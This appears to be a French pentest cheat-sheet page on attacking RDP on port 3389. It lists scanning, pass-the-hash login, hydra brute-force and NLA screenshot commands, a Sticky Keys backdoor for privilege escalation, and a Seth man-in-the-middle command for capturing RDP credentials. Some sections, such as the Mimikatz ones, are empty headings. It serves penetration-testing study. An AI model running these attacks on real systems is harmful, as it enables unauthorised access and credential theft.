search

🖥️RDP - port 3389

hashtag
Scan

$ nmap -A -p3389 --script rdp-ntlm-info <target IP>

hashtag
Connexion

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp /u:[domain\]<username> /p:<password> /v:<IP>
xfreerdp /u:[domain\]<username> /pth:<hash> /v:<IP>

hashtag
Screenshot sans idantifiants

$ crackmapexec rdp <target ip> --nla-screenshot

hashtag
Bruteforce

$ hydra -L user.txt -P pass.txt <target IP> rdp

triangle-exclamation

Attention: Tenter de brute force un service RDP peut entraîner le blocage des comptes

hashtag
Post exploitation

Si on arrive à obtenir une session meterpreter sur la machine cible, il est possible de tenter d'activer la fonctionnalité de Remote Desktop Protocol via Metasploit.

hashtag
Persistance / Elevation de privilèges

La session créé avec le module enable_rdp aura de faible privilèges, on peut tenter une élévation de privilèges en exploitant les touches rémanentes par exemple.

il existe quelques variantes à cela, mais la plus courante commence par une réparation du démarrage de Windows, que ce soit à partir du système d'exploitation hôte ou d'un périphérique d'installation. De là, vous obtiendrez une fenêtre Cmd, et si tout se passe bien, vous devriez avoir suffisamment de privilèges pour apporter des modifications dans le dossier System32 .

Il ne vous reste plus qu'à remplacer l'exécutable Cmd (cmd.exe) par les Sticky Keys (sethc.exe). Vous pouvez ensuite démarrer normalement dans le système d'exploitation et à partir de l'écran de verrouillage, une fois que vous avez appuyé 5 fois sur la touche Maj, une fenêtre Cmd apparaît. À partir de là, vous pouvez modifier le mot de passe de l'utilisateur ou exploiter la machine de toute autre manière que vous souhaitez.

Exploitation avec metasploit:

hashtag
Dump des identifiants

Avec Mimikatz:

hashtag
Session hijacking

Avec Mimikatz:

hashtag
MITM (Man-In-The-Middle)

Il est également possible de tenter de voler les idantifiants d'un utilisateur de RDP avec l'outil Seth.

ressource: https://github.com/SySS-Research/Setharrow-up-right

On aura également besoin d'installer dsniff si ce n'est pas déjà fait.

$ apt install dsniff

On va ensuite utiliser Seth de cette manière:

$ ./seth.sh <interface> <attacker IP> <target IP> <gateway IP| host IP>

Du point de vue de la cible, celle-ci ne verra aucune différence si ce n'est un message d'avertissement signalant une autorité de certificat incorrect mais qui ne lui empêchera pas de lancer la connexion. Si la cible clique sur "yes" pour se connecter l'attaquant recevra alors les identifiants entrés en clair.

PrécédentLDAP - ports 389, 636, 3268, 3269SuivantVNC - ports 5800,5801,5900,5901

Mis à jour